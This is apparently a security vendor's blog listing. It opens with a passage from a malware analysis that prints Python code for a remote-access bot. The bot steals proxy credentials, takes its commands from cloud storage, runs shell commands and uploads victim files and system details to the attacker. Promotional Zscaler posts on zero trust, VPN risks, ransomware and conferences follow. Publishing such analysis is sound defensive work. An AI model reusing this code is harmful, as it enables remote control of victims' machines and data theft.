os.environ.get('COMPUTERNAME') def getSysinfo(): return ('{}-{}').format(platform.platform(), os.environ['PROCESSOR_ARCHITECTURE']) def uploadfiles(filename, proxy): try: if search(respath, os.path.basename(filename), proxy)['matches']: delete(respath_s + os.path.basename(filename), proxy) fopen = open(filename, 'rb').read() upload(fopen, respath_s + os.path.basename(filename), proxy) except Exception as e: pass def msgparse(path, proxy): try: msg = download(path, proxy) return json.loads(aesciper.decrypt(msg)) except Exception as e: return False class Sendmsg(threading.Thread): def __init__(self, text, proxy, jobid='', attachment=''): threading.Thread.__init__(self) self.text = text self.jobid = jobid self.attachment = attachment self.proxy = proxy self.daemon = True self.start() def run(self): filename = uniqueid filename = (u'back#{}#{}#.txt').format(uniqueid, self.jobid) file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': self.attachment, u'msg': self.text}) if self.attachment: if os.path.exists(self.attachment) == True: file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'file': os.path.basename(self.attachment), u'msg': self.text}) uploadfiles(self.attachment, self.proxy) while True: try: if search(respath, filename, self.proxy)['matches']: delete(respath_s + filename, self.proxy) upload(aesciper.encrypt(file_content), respath_s + filename, self.proxy) break except Exception as e: time.sleep(10) def checkJobs(proxy): while True: try: joblist = search(jobpath, uniqueid, proxy) for job in joblist['matches']: msg = msgparse(job['metadata']['path_lower'], proxy) jobid = job['metadata']['path_lower'].split('#')[2] if msg: cmd = msg['cmd'] arg = msg['arg'] if cmd == 'download': Download(jobid, arg, proxy) elif cmd == 'upload': Upload(jobid, arg, msg['file'], proxy) elif cmd == 'cmd': execCmd(arg, jobid, proxy) try: delete(job['metadata']['path_lower'], proxy) except Exception as e: pass time.sleep(10) except Exception as e: time.sleep(10) def call_online(proxy): info = {u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser()} filename = ('online#{}#.txt').format(uniqueid) file_content = json.dumps({u'sys': getSysinfo(), u'date': getdate(), u'pcname': getComputername(), u'user': getUser(), u'msg': info}) while True: try: if search(respath, filename, proxy)['matches']: delete(respath_s + filename, proxy) upload(aesciper.encrypt(file_content), respath_s + filename, proxy) break except Exception as e: time.sleep(10) def startbot(proxy): regthread() call_online(proxy) try: checkJobs(proxy) except Exception as e: pass if __name__ == '__main__': isproxy = check_proxy() if isproxy: try: server = get_proxyserver() ie_creds = get_ie_creds(server) if ie_creds: flag = check_cred(server, ie_creds) if flag: startbot(isproxy) else: startbot(not isproxy) else: chrome_creds = get_ie_creds(server) if chrome_creds: flag = check_cred(server, chrome_creds) if flag: startbot(isproxy) else: startbot(not isproxy) else: flag = check_cred(server, []) if flag: startbot(isproxy) else: startbot(not isproxy) except Exception as e: startbot(0) else: startbot(isproxy) Sudeep Singh The Formula for Flawless Data Protection Your data is under attack. That statement shouldn’t take anyone by surprise. But do you have the right data protection platform in place to keep your data safe? Judging by recent news reports and statistics, the answer is…no. An ongoing problem Reports of data breaches seem to make the news on a daily basis. While writing this blog, a report broke about a cyberattack on London’s Hackney Borough. While details of the attack are limited and an investigation by the UK National Cyber Security Centre has just begun, Philip Glanville, Mayor of Hackney, noted that, once the attack was discovered, one of his first priorities was “protecting data.” Data is what cybercriminals are targeting. After all, data has become the currency for these bad actors. Once your data is in their hands, they can sell it on the dark web or hold it for ransom until you pay to get it back. That’s why attacks persist. So much so that organizations today are more likely to get hit with an attack than in previous years. And these data breaches are more than an annoyance or an IT headache. They can be incredibly costly to organizations. A 2019 study from the Ponemon Institute, which surveyed 507 companies that had suffered a data breach, revealed that the average cost of a data breach to companies is $3.92 million globally. And that doesn’t take into account other costs—specifically the broken trust of your customers and employees whose personal data winds up in the hands of cybercriminals. That could cause irreparable harm to your brand and business. So, for those who have been hit with a data breach, you are not alone. And, for those who haven’t been hit with a data breach, there's a good possibility that you will be. A failed experiment If they are being honest, IT and security professionals will tell you that protecting data used to be easier—back in the days when all data was housed in the data center and employees worked in the office. However, as applications move to the cloud and employees are working from practically anywhere, legacy security procedures have proven inadequate. Security can no longer be static. It has to go where your employees go and where your data goes, especially when your employees drop off the corporate network, away from your security controls. In response, organizations have looked to the cloud for help. But as in just about any industry, not all solutions are the same, with some promising more than they can deliver. The right formula When looking for a cloud security provider, organizations need to be wary of vendors that simply spin up virtual instances of their hardware-based systems. These systems suffer from the same problems as their terrestrial counterparts. Only a purpose-built cloud offering can provide the type of security your data, business, and employees need. That offering needs to include enterprise-grade data security built on an inline data protection architecture that scales to enable organizations to inspect all SSL-encrypted traffic. This is critical because, at the beginning of October 2020, 95 percent of all traffic on Google was encrypted. If your system can’t inspect all SSL traffic, you are blind to the threats that could be hiding there. To ensure strong data protection, organizations need to look for a cloud security platform that includes the following three essential elements: A purpose-built SASE architecture. The best context for better data classification. A unified platform that protects all channels. Let’s take a closer look at each of these. A purpose-built SASE architecture: Organizations often use cloud access security broker (CASB) and data loss protection (DLP) tools as part of their data protection strategy. But for these solutions to perform at the highest level, they require full SSL inspection—something appliances just can’t deliver. A purpose-built SASE cloud platform is the first requirement to deliver high-performing, always-on secure connections no matter the user’s location. SASE unifies all CASB, DLP, and security services into a globally distributed cloud platform so you get less complexity, better data protection, and a fast user experience. The best context for better data classification: To properly classify the data you have, you need context, but it’s the quality of context that helps you make the best, most informed decisions. Today, your data moves across hundreds of channels—from cloud apps to public clouds to file-sharing platforms. And all the context you need in those channels is hiding inside SSL encryption. A data protection platform must have visibility into all SSL traffic, which provides organizations with a treasure trove of context. A unified platform that protects all channels: Protecting your data from leakage and exfiltration requires security to be everywhere your data is. If you can’t control every channel, your data is vulnerable and exposed to potential threats. Also, if you can’t unify all CASB and DLP protections into one platform, you’ve made things way too complex. Without a single platform view, you end up with a disjointed policy, security gaps, and a greater propensity for costly configuration mistakes. When these critical elements are part of a security platform built specifically for the cloud, you get data protection that meets the needs of today’s world. Your data is protected wherever it is and wherever your employees access it. And you won’t become another story that pops up on my news feed. Want to learn more? Check out our latest report on flawless data protection. Steve Grossenbacher is a director of product marketing at Zscaler. Steve Grossenbacher Measuring Your Attackable Threat Surface With the Zscaler Internet Attack Surface Analysis Tool This was originally published on LinkedIn on October 13, 2020, Did you leave the window open? Lock the door? The invitations to cyberattacks are there. And bad actors can see them. But can you? Few enterprises have a solid grasp of their own vulnerability to cyberattacks. Attackers seek entrance in the form of enterprise IP addresses and namespaces exposed to the open internet. Each of those exposed addresses represents a metaphorical door into your corporate network and systems, and threat actors quickly identify which of those metaphorical doors aren't locked. (Of course, once through the door, the hackers have run of the corporate house.) Traditional network security attempts to address those vulnerabilities by "listening" to inbound connections to identify incoming threats. There's a frustrating irony to this: This “listening” approach to network security exposes yet more IP addresses and namespaces to the outside (read: hostile) world. This leaves servers vulnerable to attack and exposes your internal applications, data, systems, resources, and other proprietary assets. Enterprise IT leads have a responsibility to understand the extent of their own exposure and then mitigate the risk associated with that vulnerability. CISOs must be able to answer the question "How many doors did I leave open?" Or perhaps more appropriately, "How many of those doors can bad actors see?" There hasn't been a constructive way to measure an organization's vulnerability to attack from outside. Until now. At this week's Zscaler CXO Summit, I had the privilege to demo Zscaler's Internet Attack Surface Analysis Tool. The Internet Attack Surface Analysis Tool is free and available now on the Zscaler website. The Internet Attack Surface Analysis Tool assesses and then quantifies an organization's network exposure risk. In this way, it conceptualizes an organization's attack surface, giving IT leads information to reduce risk. A few important caveats: The Internet Attack Surface Analysis Tool performs its analysis functions without actively scanning or connecting to a customer’s network(s). It queries only passively available information sources. Zscaler validates all scan requests to ensure that users can only scan their own organization. The Internet Attack Surface Analysis Tool does more than "count doors." It performs a comprehensive network exposure audit, identifying: Known vulnerabilities: These are security flaws with known exploits and represent a huge risk to enterprise cybersecurity. SSL/TLS risks: Systems with outdated encryption protocols are tempting attack targets for hackers. Exposed servers: Servers that are open to the internet are an entry point for threat actors seeking to move east/west within a corporate network perimeter. Namespace exposure: Keywords associated with a namespace divulge information about applications and systems, and represent an unintended (and often overlooked) risk to the company. Public cloud instances: When not closely managed, public cloud instances associated with an organization can become an attack vector. Companies with active "shadow IT" efforts are particularly vulnerable. The Internet Attack Surface Analysis Tool produces an extensive report that quantifies an organization's attack surface based on the assessment criteria above, as well as several other performance and exposure metrics. It also recommends detailed mitigation strategies for each risk measurement. Let's look at a snippet of an example output report: This is a real-world example from an assessment performed on an anonymized Fortune 500 company. "Acme Corp." is vulnerable to attack. It has a sizable attackable surface area and a dangerous network exposure risk. The assessment calls out Acme's out-of-date encryption protocols. But of particular note are the "Known Vulnerabilities" to critically severe threats: Acme Corp. has not kept up with its security patching. Hackers attack what they can see. Connectivity shouldn’t require exposure, yet it does when enterprises connect outdated legacy network architectures to the internet. Connectivity must be inside-out, not outside-in. Cloud-based ZTNA/SASE solutions, such as the Zscaler Zero Trust Exchange platform, employ the internet to supplant perimeter-based security, enabling (and more importantly, securing) direct, one-to-one connectivity between user and resource. It's a model that secures the way people actually work and obscures corporate systems from the outside world. The Internet Attack Surface Analysis Tool identifies enterprise vulnerabilities. But it's only a first step toward strengthening an enterprise's threat posture. The object lesson here is embodied in Acme Corp. After its Zscaler-enabled digital transformation, Acme Corp. re-ran its Internet Attack Surface Analysis Tool assessment. The result? A “LOW” risk assessment and a greatly reduced attack surface. Watch my CXO Summit innovation showcase presentation here. And learn more about the Internet Attack Surface Analysis Tool here. Patrick Foxhoven is the Chief Information Officer and EVP Emerging Technologies at Zscaler. Patrick Foxhoven Zenith Live 2020: Beyond the Limits of Legacy Thinking This post also appeared on LinkedIn on October 17, 2020. The way the world works has changed. And so has the way we put on conferences. In the last two years, I've had the great privilege to meet and engage directly with Zscaler customers, partners, and innovators at Zenith Live, Zscaler's annual conference and the world's premier global cloud summit. I've been joined on stage by tech leaders from companies that include Siemens, GE, Microsoft, Orange Business Services, Carlsberg, Mars, AIG, Hyatt, Cushman & Wakefield, MAN Energy Systems, and so many more. Zenith Live 2020 will understandably be different, and I look forward to the day when we can all meet in person once again. But I am thrilled about the agenda the team has put together—the speakers, the training, and, above all, the chance we'll all have to explore the ways various organizations are accelerating transformation to achieve their goals. This year, Zenith Live 2020 goes virtual December 8–10: All sessions will be offered online, and attendance is free. I invite you to join me and IT leaders and practitioners like you who are creating real change in their organizations by leading the drive to a mobile, cloud-first future. The theme of Zscaler's third annual cloud conference is “Beyond Limits.” That's an especially apt ideal today: The new IT enables business growth, but only when leaders look beyond the limits of legacy systems, legacy security, and legacy thinking to advance a cloud-first future. We've all had to pivot. But in change lies opportunity, and agile IT leaders are seizing this moment to accelerate secure digital transformation. Now, we have the chance to learn from them: Zenith Live 2020 will feature inspiring speakers and practical training for CXOs, IT execs, network architects, security managers, and business leaders. There's something for everyone: Hands-on training classes for cloud-security beginners and masters alike, with curricula for network, security, and ZPA tracks. "Birds of a Feather" networking events, including the Women in IT Exchange, featuring Jody Davids, former PepsiCo SVP and Global CIO, who'll share her personal experience leading IT for some of the world's biggest consumer brands. Breakout sessions with content focused on the Zscaler solution foundations, the Zscaler Zero Trust Exchange platform, the secure access service edge (SASE) model, network transformation, security transformation, data protection, digital experience, and more. Voice of the Customer CXO main stage sessions with enterprise IT leaders driving their organizations’ secure digital transformations. Insightful customer stories from IT leaders at Carrier, Takeda Pharmaceuticals, Stanley Black & Decker, Siemens, and many more. Virtual Showcases where you can demo the latest cloud technology from Zscaler and Zscaler partners. Digital transformation is a team sport, and Zenith Live 2020 is geared toward collaboration. You can expect plenty of opportunities for peer engagement, some surprise guests (!), and practical advice from experts who have fully negotiated the journey you are now on. We'll visit with astronaut Scott Kelly, who will offer teamwork guidance based on his time on the ISS. And WIRED senior writer and author of "Sandworm" Andy Greenberg will join Zscaler's Lisa Lorenzin to talk about the latest trends in cybersecurity. Check out the agenda here. At this year's Zscaler cloud summit, every seat is in the front row. I hope you can join us virtually in December for Zenith Live 2020, the free Zscaler Cloud Summit December 8–10, 2020. Register now. Dr. Amit Sinha is President and CTO of Zscaler. Dr. Amit Sinha VPNs: The Biggest Threat to Your Industrial Control System Is zero trust access the answer to the growing problem of VPN access to industrial control systems? I think so, and I’m not the only one. What makes VPNs dangerous Virtual private networks (VPNs) are used to extend network connectivity between users and applications or industrial control systems (ICSs). So it is a natural progression for IT to propose the use of VPNs to enable third-party access to an organization’s ICS. In many cases, the operational technology (OT) or ICS vendors themselves started deploying VPNs to gain remote access to these systems. With remote access, the OT team’s goal is to reduce downtime for the production lines. But VPNs have failed to deliver on that promise as they have become the primary source of unplanned downtime. Let’s take a look at some of the problems with VPNs. Flat network: By design, VPNs create bidirectional tunnels between two networks, but inbound traffic flows are the source of all things bad. To make things worse, many ICS systems allow IP multicast and IP broadcast communication to ensure the supervisory control and data acquisition (SCADA) or programmable logic controller (PLC) software can discover all the OT devices over the VPN. In many cases, the VPN connects to a jump box on the IT network, which is actually bridging the OT network directly to the third-party. This level of network access to third parties defeats the very goal of achieving an air-gap between OT and IT. ICS systems communicate in clear text over EtherNet/IP and do not require any form of authentication. But design and configuration software for discrete, process, batch, motion, safety, and drive-based applications was not designed for remote access over VPN and lack security controls commonly found in IT application software. With third-party users using the same laptop to connect to their office network, home network, and many other companies, the attack surface becomes significantly larger. Vulnerabilities: It seems as if every VPN vendor on the planet has disclosed severe vulnerabilities in its VPN appliances. For OT system owners, this means VPNs are the favorite targets for attackers to gain unauthorized access and inject ransomware into your OT network. Also, VPNs require DDoS protection since they are accessible to anyone on the internet at all times. “Emerging threats such as ransomware attacks on business processes, potential siegeware attacks on building management systems, GPS spoofing and continuing OT/IOT system vulnerabilities straddle the cyber-physical world.” – Top 9 Security and Risk Trends for 2020, Gartner, September 2020 Ransomware: VPNs put users’ devices on to your OT network. Ransomware typically propagates over the network, infecting other computers connected to it. OT presents a target-rich environment with many workstations on the OT network running older versions of a Windows operating system (OS). There are several instances where ransomware from a third-party user connected over VPN led to massive disruption in the OT network. Ransomware attacks originating on the IT network and spreading to the OT systems have occurred at multiple organizations, including Norwegian aluminum producer Norsk Hydro, resulting in damages exceeding $1 billion. Unpatchable systems: Most OT systems use an older version of Windows or purpose-built software that has reached end-of-life or end-of-support. Regularly patching OT systems, irrespective of the underlying OS, is not an option due to the lengthy and cumbersome approval process required by OT vendors. There have been well-documented cases of patches applied to OT systems that have resulted in complete system malfunction. In 2017, a security patch shut down monitoring equipment in a large NASA engineering oven, resulting in a fire that destroyed spacecraft hardware. Unpatchable systems or delayed patching is a major vulnerability that is often exploited by attackers. Do third-party users really need network access? It is time to stop bringing users, especially third parties, on to your network when they only need access to the OT systems to perform remote maintenance. The network-centric VPN-based approach, including DMZs and firewalls, has been in use since the Purdue Model for ICS became the standard for OT security in the late 1990s. Instead, the right approach is to connect users to applications. A zero trust approach is a better way to let third parties access the specific systems they need without allowing any inbound connections to your OT network, even with OT-IT convergence. That’s because this concept does not suggest connecting the networks; rather, it just means that users should be able to access OT systems in a secure and convenient manner. Keeping OT systems known and accessible over the internet only for authorized users eliminates the biggest attack surface and reduces the risk of ransomware or cyberattacks. Find out how MAN Energy, Johnson Controls, TT Electronics, and MOWI have taken a zero trust approach and are connecting users to applications without bringing them on the network. Deepak Patel is the senior director of OT network and security transformation at Zscaler. Deepak Patel ZPA and CrowdStrike: What This New Device Health Integration Means for You Summary: Zscaler and CrowdStrike announced a new device health integration Device health score will be used to automatically update ZPA access policies Joint customers of ZPA and CrowdStrike ZTA can leverage it Adopting a zero trust model is highly sought after and much talked about—especially in the context of remote work. A majority of the workforce is now remote, accelerating security concerns for devices and connectivity. Image: Microsoft The world is evolving and embracing a combination of remote and on-premises workers, so security measures must also adapt to enable this new normal. In order to obtain end-to-end security and protect data, it is imperative to understand device posture and user identity to enable secure access to applications. These components must be continuously assessed to identify attack risks and prevent expensive reactive measures. Device posture is not a one-time consideration; it needs to be monitored on an ongoing basis, and this information must be passed along to the zero trust service responsible for providing secure access to applications. Zero trust with Zscaler and CrowdStrike through endpoint posture assessment Zscaler and CrowdStrike have partnered to deliver secure access to applications by providing conditional access based on the user’s identity, location, and the posture of the device. With the announcement of this new integration between ZPA and CrowdStrike Zero Trust Assessment, the Zscaler and CrowdStrike partnership has grown even deeper. CrowdStrike provides a health score for each device, and then surfaces it as a continuous stream of posture assessments. These scores provide ZPA with an enhanced understanding of device posture, allowing ZPA to leverage this information, auto-update policies, and decide whether to allow access to a private app or block the device from access. What does this integration mean for customers? Joint ZPA and CrowdStrike ZTA customers will be able to: Use device health metrics for a deeper understanding of the device posture Isolate devices to prevent malware propagation before they connect to apps Automate updates to access policies based on APIs from CrowdStrike to ZPA Ensure that only compliant devices gain access to sensitive data Increase visibility with stronger reporting and remediation Through our conversations with customers, we know that zero trust is an important aspect of this journey, especially with helping your organization move beyond crisis mode with legacy software to a sustainable and modern, long-term solution. True zero trust equates to having device and user identity awareness and the right policies enforced. This new integration is a huge step in that direction. Learn more: Video: Zscaler + CrowdStrike Demo Customer Testimonial: Cushman & Wakefield Kanishka Pandit is a product marketing manager for Zscaler Private Access Kanishka Pandit A Crowning Achievement: Cyber Security Essentials Certification in the UK The National Cyber Security Centre (NCSC) is on a mission to make the UK the safest place to live and work online. I’m excited to say that Zscaler has joined the NCSC’s effort by attaining the organization’s Cyber Security Essentials certification in the UK. This certification is the latest achievement in Zscaler’s compliance expansion initiative that the company is pursuing in support of partners and customers around the world. Zscaler serves many organizations across the UK and partners closely with BT Group. The NCSC certification enables us to be a provider on the Commercial Crown Services contract supporting UK government agencies. The NCSC has served as a single resource for government agencies, companies of all sizes, and the general public to help them protect themselves from a range of cyberattacks, and it works with law enforcement, defense companies, the UK’s intelligence and security agencies, and international partners. In 2014, the NCSC established its Cyber Essentials certification, and, since October of that year, the certification has been required for suppliers to UK government agencies that handle certain types of sensitive and personal information. Every organization today faces the risk of a cyberattack—no one is immune. But government agencies carry a particular burden as they must protect sensitive data that constituents are required to provide. Furthermore, any downtime as a result of a breach can disrupt the delivery of critical services, such as law enforcement or healthcare. Earlier this year, INTERPOL reported that attackers were targeting hospitals already stretched thin in the fight against COVID-19: “Cybercriminals are using ransomware to hold hospitals and medical services digitally hostage; preventing them from accessing vital files and systems until a ransom is paid.” Attacks against state and local governments in the U.S. increased by 50 percent in 2020, according to GCN. The good news is that many governments are taking the lead in modernizing IT by shifting their applications and infrastructures to the cloud, which has the added benefit of enhancing security. Zscaler was created for this world in which applications have moved out of the data center and users have moved off the trusted network. By sending user traffic through the Zscaler Zero Trust Exchange, the world’s largest security platform built for the cloud, agencies can reduce cyber risk and significantly improve the user experience for their employees connecting from home—and anywhere. Zscaler ensures that millions of employees at thousands of enterprise and government organizations worldwide are protected against cyberattacks and data breaches. Each organization faces unique regulatory challenges based upon industry, geography, and other factors, and the Zscaler platform is designed to simplify compliance and reporting, globally. Zscaler is also committed to ensuring that our global customers and partners are able to meet diverse compliance and global privacy requirements, including those defined by GDPR, CCPA, PIPEDA, and many more. Zscaler meets a range of compliance requirements: Service Organization Control (SOC) 2, Type II in accordance with the American Institute of Certified Public Accountants’ applicable Trust Services Principles and Criteria. FedRAMP High certification at multiple levels that meet the requirements of federal government agencies, including civilian, DoD, and intelligence organizations. FIPS 140-2 Federal Information Processing Standard that meets NIST requirements for cryptographic modules. CSA – Star Cloud Security Alliance Gold-level Security, Trust & Assurance Registry (STAR) Level 2 Certification ISO 27701, certification assures that Zscaler services are based on internationally recognized best practices for information security management systems. ISO 27018 focuses on the protection of personal data in the cloud Criminal Justice Information Services (CJIS) compliance ensures the protection of information as required by Criminal Justice Information Services Security Policy Information Security Registered Assessors Program (IRAP) ensures that appropriate controls are in place for addressing the requirements of the Australian government Information Security Manual (ISM) produced by the Australian Cyber Security Centre (ACSC). Learn more at Stephen R. Kovac is the Zscaler Vice President of Global Government and Compliance Stephen Kovac Ransomware’s Pivot: A Business School Case Study There are very few technology companies that successfully pivot their business strategy to adapt to a macro paradigm shift. A classic case study in adapting to changing market conditions is the Netflix video streaming service. Home video rentals evolved from local mom-and-pop video rental stores, to chains like Blockbuster and Hollywood Video, to DVDs-by-mail from Netflix, and finally to digital streaming. Today there are scores of streaming services, but of all of them, Netflix was the only one to successfully pivot from physical discs to digital streaming. It took incredible vision and, based on the company’s market cap, it was clearly the right move at the right time. Malware has undergone an evolution similar to that of video rental services. Programmers created the first viruses and worms primarily motivated by academic reasons or bragging rights. There was very little financial incentive to attack systems other than to cause mayhem. State-level hacking was always driven by espionage and sabotage. Credit card theft involved too much risk for those trying to sell the card numbers and eventually cashing out. The financial motivation for hacking did not explode until the dawn of ransomware. Around 2015, a new strain of malware began to rear its ugly head when people's files started getting encrypted, leaving only a direct message behind: pay us a fee or your data is gone forever. There was a particular attraction to this attack method over stealing credit card numbers. The hackers would receive direct payments, often in the form of untraceable cryptocurrency like Bitcoin, in exchange for the decryption key. This model cut out the middleman and also instilled urgency in the victim to pay. The ransom demand would often increase significantly after a specified period and the attackers would delete the decryption key after too much time had passed, rendering the files permanently unrecoverable. Holding files hostage in exchange for money worked surprisingly well for several years. In 2019, over 100 cities and municipalities got hit with ransomware, resulting in hundreds of millions of dollars paid out in ransom. However, in the never-ending cat-and-mouse game between security researchers and hackers, the ransomware attacks are only getting worse; they never get better. New requirements for organizations to get cybersecurity insurance, improve user-awareness training, and enhance security controls make it more difficult for ransomware gangs to infect organizations and extract ransom payments. In a brilliant business decision, ransomware gangs decided to change tactics and not only encrypt a victim organization's files but also steal the data and threaten to expose it. Stealing the data before encrypting it pressures organizations to pay the ransom and pay higher amounts, but it also serves as an insurance policy with which to embarrass or expose organizations that chose not to pay. There have been several high-profile breaches in which the organizations decided not to pay the ransom demand and instead were able to recover their systems from recent backups. That did not prevent the attackers from releasing highly confidential information from their high-profile victims. The attackers’ hope is that the next victim will pay the ransom rather than suffer the loss of business reputation that results from a data breach. This past summer, the first known instance surfaced of an organization successfully stopping a ransomware attack, but still having to pay the ransom. On a statement posted to its website, the company admitted that unknown attackers breached its systems and the attackers attempted to execute a ransomware attack. Security controls and a robust incident response plan stopped the ransomware before it could run. This would typically be a happy ending to an IT security story. Still, the company’s disclosure explains that the attackers first exfiltrated customer data from its servers before attempting to launch the ransomware attack. The robust security controls and incident response plans worked brilliantly to detect and block the ransomware attack but were powerless to stop the data theft. As a result, the company paid the attackers an unspecified ransom in exchange for promising to destroy the data and refrain from selling it. Mike Tyson famously said that everyone has a brilliant plan until they get punched in the face. The company in this case had planned for the inevitable ransomware attack against its network, but it failed to realize that it would still be on the hook to pay a ransom to prevent the exposure of any data stolen in the attack. Proxy not passthrough Because today’s ransomware attacks are uniquely crafted for each target, every business targeted with ransomware effectively becomes a new patient zero. Sandboxing approaches that do not operate inline are becoming increasingly useless. That first new unknown file will always be missed, and the typical sandbox can’t hold it for proper analysis. When considering options to improve your ransomware protection, look to an inline proxy approach to sandboxing: Zscaler Cloud Sandbox. A proxy allows security teams to apply game-changing “quarantine” to inbound unknown files. These new unknown files can be held and fully analyzed before delivery, a vast improvement over traditional sandbox “passthrough” approaches that allow the first file to reach its target and create the dreaded patient-zero. It’s also vital that you perform full SSL inspection on ALL your traffic, so threats have nowhere to hide. Packaging all this up in a cloud-delivered platform guarantees that you can scale SSL inspection without capacity limitations and follow users on and off the network for airtight coverage. Learn about Zscaler Ransomware Protection. Chris Louie, CISSP, is a sales engineer at Zscaler Christopher Louie Six Steps for Effective Public-Sector Cloud Adoption in a Post-COVID World Throughout Australia and New Zealand, governments and public-sector bodies are facing significant challenges caused by the rapid impact of technology. New work patterns are replacing those that have been in place for years, which, in turn, is changing the way services are delivered. The pace of this change has increased further in the wake of the COVID-19 pandemic. Most staff are now required to work remotely, and operations have had to be redesigned to make them less office-centric. One significant shift has been an increase in the use of cloud platforms. The public sector was already coming to understand the performance and cost benefits of using hosted resources. Now COVID-related pressures are increasing shifts from legacy, on-premise systems to cloud-based alternatives. The importance of effective cybersecurity Current operating conditions are far from normal, and there’s an understanding it’s possible things will never return to precisely the way they were before the virus appeared. Governments need to continue to assess the way they operate so they can be best positioned to deliver services in the new world in which they now have to operate. They must also ensure that trusted connectivity is in place. Data and applications need to be accessible by those who require them from wherever they happen to be, and this must be done securely. To achieve this, there are six critical steps Australian and New Zealand government agencies need to take. These steps are: 1. Embrace effective management Governments and agencies at all levels must become leading champions of enterprise security risk management. This role has to include the three areas of cybersecurity, physical security and personnel security. 2. Private-sector parity Governments and agencies that have a role in providing essential services should be required to meet the same cybersecurity standards as privately-owned critical infrastructure. This includes having in place increased levels of accountability and oversight. 3. Decommission legacy systems As part of the ongoing adoption and broader use of cloud-based services, governments should follow a strategy of decommissioning vulnerable legacy IT infrastructure. This process needs to be well-planned, disciplined, monitored and accountable. 4. Adopt zero trust To radically improve cybersecurity, governments must embrace the Zero Trust Network Architecture (ZTNA) specified by analyst firm Gartner. This removes the concept of a network perimeter and ensures all applications and data stores are protected regardless of where they are located. All agencies can then use a consistent set of cloud-delivered security services that can be tailored to suit their particular requirements. 5. Combine forces Rather than each agency selecting and deploying its own cloud resources, many could come together and take advantage of those who can support multiple agencies as individual tenants. The portfolio of services available in this way include secure web gateway services, remote access and zero trust application connectivity, identity management, email and end-point protection. Governments should make a clear vendor or service selection at all levels of the security stack, while minimising the selection and procurement hurdles. 6. Observe guidance In Australia, governments and agencies should ensure they adopt the Australian Cyber Security Centre’s guidance on using the Information Security Registered Assessors Program (IRAP). This process provides a better level of technical audit than ISO27001 and ensures the quality and fit of selected cybersecurity products and services. Following these steps will ensure Australia and New Zealand’s public sector will be best placed to deal with the new post-COVID environment that will continue to emerge in coming months. By securely embracing the cloud, they will be much better positioned to deliver the services that business and the public require. However, achieving this requires more than just investing in technology. There also has to be a shift in mindset. All those involved will need to think and act differently in response to what will be very different operating conditions. A failure to do this could lead to more strategies and more funding not delivering the benefits that are possible. By taking the time to map out comprehensive strategies and ensure they are aligned with the new ways of working now in place, Australian and New Zealand governments can ensure they’re able to operate efficiently and effectively as the country heads along the road to recovery. Download our comprehensive ebook, Securing Remote Work, to see how organizations around the world are safeguarding business continuity in the work-from-anywhere era. Budd Ilic is the Zscaler country manager for Australia and New Zealand Budd Ilic Zscaler is an Innovator Sponsor at the ONUG Fall 2020 Virtual Conference The way employees work has changed dramatically in the past year as the world has had to quickly adopt work-from-home technologies for the sake of user productivity and business operations. While this has given employees the freedom to access data from practically anywhere, it also brings a host of challenges when it comes to mitigating business risk. These issues will be a central theme during the ONUG Fall 2020 Virtual Conference, which is why we are pleased to be an Innovator Sponsor this year. We hope to see you there! Before COVID-19, it was easier to get by with a traditional "castle and moat" approach to security. Now, with many organizations moving to a fully remote workforce, there is a need for security to follow users off of the corporate network. Moreover, we are witnessing a swift deconstruction of private data centers and the acceleration of enterprise cloud adoption. Therefore, today's businesses must adopt and deploy a cloud-delivered and scalable security solution. Zscaler provides cloud-delivered security and access services to ensure that businesses can operate under any conditions, at any scale, with employees anywhere in the world and on any device. The key is that a cloud-delivered service remains inline, securing all connections between users and the applications necessary to keep the business running smoothly. The Zscaler Zero Trust Exchange platform delivers secure, seamless access to the internet and cloud apps (Zscaler Internet Access) or private apps in the data center or public and private clouds (Zscaler Private Access). Access is based on software-defined business policies that follow users no matter where they connect or what devices they’re using. With more than 150 globally distributed data centers, security is brought as close to the user as possible for fast access no matter where users connect. You can hear a lot more at the ONUG Fall 2020 Virtual Conference, October 14-15, 2020. We look forward to sharing with the ONUG Community and Conference attendees how Zscaler helps organizations move away from legacy security technologies that were not built for today’s workforce and enables secure and efficient work-from-anywhere experiences. Here are all the ways you can learn about Zscaler during the conference: Zscaler Keynote Address: October 15 at 1:50 PM ET Accelerating Your Secure Digital Transformation. The cloud and mobility are powerful enablers of digital transformation, but many IT organizations are grappling with legacy architectures and processes that haven't evolved much in decades. When applications lived in the data center and users were connected to the network, it made sense to invest in a hub-and-spoke architecture and to protect it with a castle-and-moat security perimeter. But these models prevent organizations from taking full advantage of the agility, productivity, efficiency, and speed enabled by digital transformation. Network and security architectures must evolve to meet business needs in the new era. In this session, Zscaler CEO Jay Chaudhry talks with Craig Williams, CIO of Ciena, about their experiences as they led the evolution from the old world to the new, with insights into the challenges they overcame on their successful transformation journeys. Panel Discussion: October 14 at 3:55 PM ET Great Debate: Remote Workforce Infrastructure, On-Prem, or Cloud-Based? Join this session to hear from experts in the field including Larry Biagini, former VP & CTO at GE and now Zscaler Chief Technology Evangelist about the role of on- and off-prem remote workforce infrastructure options and choices. Zscaler Proof of Concept: October 14 at 1:30 PM ET This Proof of Concept is also being show in the Zscaler Virtual booth over the course of the two day virtual event. Zscaler Open Session: October 15, at 11:25 AM ET Enabling Enterprise Digital Transformation – Illustrated You’ve probably been hearing a lot about digital business transformation, but has anyone talked to you about what it means for your organization? Why does it matter? What does it entail, and how do you start? In this video whiteboarding session, you’ll have the chance to hear from Zscaler's Solution Architect, Brian Deitch, about the drivers of digital transformation, get answers to your questions, and learn how to take the first steps—or the next steps—on your journey. The session will cover a range of topics, including the Gartner SASE framework, SD-WAN, the changing branch architecture, IT simplification and cost reduction, the need to support work-from-home initiatives, and the benefits of cloud-native security that supports secure, any-to-any connectivity, and more. We look forward to seeing you at the event, be sure to register today using Zscaler’s exclusive free passcode. Andrea Smith is a Sr. Field Marketing Manager at Zscaler Andrea Smith When Technology isn’t the Problem: The Psychology of IT Transformation This post was originally published on LinkedIn on September 16, 2020 Enterprises transform network architectures to become more agile and better able to meet business goals. But transitioning your network from a traditional hub-and-spoke network to a cloud services model can be a daunting task. Transformation leaders (like you) must address connectivity, management, performance, cost, and ROI concerns. But more-difficult enterprise network transformation obstacles are often overlooked. The most important question you should ask before embarking on a cloud transformation journey isn’t about security. It’s about people, and how open they are to change. Many C-level leaders neglect to ask, “Is the IT team adequately prepared for our transformation journey?” Digital transformations are more likely to succeed when champions 